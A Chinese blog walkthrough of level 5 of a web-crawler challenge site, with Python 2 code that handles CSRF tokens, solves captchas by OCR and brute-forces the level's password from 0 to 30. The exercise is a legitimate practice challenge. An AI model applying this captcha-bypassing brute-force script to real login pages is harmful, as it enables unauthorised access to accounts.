黑板客 -- 爬虫闯关 -- 关卡05
简介
爬虫闯关链接:
1. 登录页面: http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/
2. 关卡页面: http://www.heibanke.com/lesson/crawler_ex04/
3. 网站首页: http://www.heibanke.com
知识点:cookie 与 session,CSRF,Web 编程,验证码识别模块
提示:本题相较于前 4 题,难点在于验证码识别。为了方便起见,这里直接使用网络上现成的 pytesser 模块。PIL 模块在 64 位 Python 下安装时可能会遇到一点小麻烦,建议尽量使用 32 位 Python。
pytesser模块安装及使用参考资料:
1. http://blog.csdn.net/evankaka/article/details/49533493
2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843
3. http://blog.csdn.net/bigzhao_25/article/details/52350781
参考代码
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import re
import threading
from pytesser import *
# Python 2 idiom: sys is reloaded so that sys.setdefaultencoding is reachable
# again, then UTF-8 is made the implicit str <-> unicode codec for the script.
reload(sys)
sys.setdefaultencoding("utf-8")

# Account used to log in, plus placeholders that are filled in at runtime.
csrf = ""
username = "Peter"
password = "112233"
captcha_0 = ""
captcha_1 = ""
attack_password = ""

# Endpoints: login form, the level's guess form, and the base for image URLs.
website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"
website_imageBase = "http://www.heibanke.com"

# Form body posted to the login page.
payload_login = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": csrf,
}

# Form body posted to the level page; password/captcha fields are overwritten
# before every guess.
payload_attack = {
    "username": username,
    "password": attack_password,
    "csrfmiddlewaretoken": csrf,
    "captcha_0": captcha_0,
    "captcha_1": captcha_1,
}

# One shared session keeps cookies across requests. The initial GET is issued
# so that the "csrftoken" cookie is available to seed both payloads.
s = requests.Session()
s.get(website_login)
csrf = s.cookies["csrftoken"]
payload_login["csrfmiddlewaretoken"] = csrf
payload_attack["csrfmiddlewaretoken"] = csrf
def Test_verCode(image_path):
    """Open the image at *image_path* and return the text OCR extracts from it.

    ``Image`` and ``image_to_string`` are presumably supplied by the
    ``from pytesser import *`` at the top of the file. The OCR result is
    returned unmodified.
    """
    return image_to_string(Image.open(image_path))
def getVerCode(resp):
    """Extract the captcha from a page response and return the image URL.

    Scans ``resp.content`` for the captcha ``<img>`` tag and for the hidden
    ``captcha_0`` input. The hidden value is stored into the module-level
    ``payload_attack["captcha_0"]`` as a side effect.

    Returns the image's ``src`` appended to ``website_imageBase``.
    Raises IndexError when either element is absent from the page.
    """
    page = resp.content
    image_sources = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', page)
    hidden_values = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', page)
    # Only the first match of each pattern is used.
    payload_attack["captcha_0"] = hidden_values[0]
    return website_imageBase + image_sources[0]
def downloadImage(Image_URL):
    """Download the image at *Image_URL* and save it as ``1.png``.

    The file is written to the current working directory, overwriting any
    previous ``1.png``. If the request fails with a connection error, a
    message is printed and nothing is written, so an existing ``1.png`` is
    left untouched.

    Returns None in both cases.
    """
    try:
        pic = requests.get(Image_URL, timeout=10)
    except requests.exceptions.ConnectionError:
        print('[-] Image can not download ')
        # Nothing was fetched: stop here instead of falling through to
        # ``pic.content`` with ``pic`` unbound (UnboundLocalError).
        return
    # The context manager closes the file even if the write fails.
    with open('1.png', 'wb') as fp:
        fp.write(pic.content)
def get_attackResp(verCode_res, attack_password, s):
    """Submit one password guess and return the server's response.

    verCode_res     -- OCR text of the current captcha; only its first four
                       characters are submitted as ``captcha_1``.
    attack_password -- the password candidate to try.
    s               -- the session object used to send the POST.

    Side effects: updates ``password`` and ``captcha_1`` in the module-level
    ``payload_attack``, and after the POST copies the session's current
    ``csrftoken`` cookie into both ``payload_login`` and ``payload_attack``.
    """
    payload_attack["password"] = attack_password
    payload_attack["captcha_1"] = verCode_res[:4]

    response = s.post(website_attack, data=payload_attack)

    # Keep both form payloads in sync with the token the session now holds.
    current_token = s.cookies["csrftoken"]
    for form in (payload_login, payload_attack):
        form["csrfmiddlewaretoken"] = current_token
    return response
def _solve_fresh_captcha():
    """Request a new captcha page, download its image and return the OCR text.

    Posts the login form through the shared session ``s``, refreshes the CSRF
    token in both payloads from the session cookie, lets ``getVerCode`` record
    the hidden captcha key, saves the image via ``downloadImage`` and runs OCR
    on the resulting ``1.png``.
    """
    resp_login = s.post(website_login, data=payload_login)
    token = s.cookies["csrftoken"]
    payload_login["csrfmiddlewaretoken"] = token
    payload_attack["csrfmiddlewaretoken"] = token
    downloadImage(getVerCode(resp_login))
    return Test_verCode('1.png')


def main():
    """Try the passwords "0" through "30" against the level page.

    For each candidate the guess is resubmitted with a freshly recognised
    captcha until the response no longer contains the captcha-error marker
    (there is no retry limit). The first response that contains no error
    marker at all is treated as success: the password and the page text are
    printed and the search stops. Nothing is printed if no candidate succeeds.
    """
    # Compare as UTF-8 bytes against the raw response body, so the match does
    # not depend on the interpreter's default str/unicode codec.
    captcha_error = u'验证码输入错误'.encode('utf8')
    any_error = u'错误'.encode('utf8')

    verCode_res = _solve_fresh_captcha()
    for i in range(31):
        resp_attack = get_attackResp(verCode_res, str(i), s)

        # A rejected captcha says nothing about the password: fetch a new
        # captcha and retry the same candidate.
        while captcha_error in resp_attack.content:
            print("[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res)
            verCode_res = _solve_fresh_captcha()
            resp_attack = get_attackResp(verCode_res, str(i), s)

        # No error marker left in the page means the guess was accepted.
        if any_error not in resp_attack.content:
            print("[+]FOUND PASSWORD:" + payload_attack["password"])
            print("\nTEXT:\n" + resp_attack.content.decode('utf8'))
            break


if __name__ == '__main__':
    main()
本文为博主总结文章,欢迎转载,请注明出处。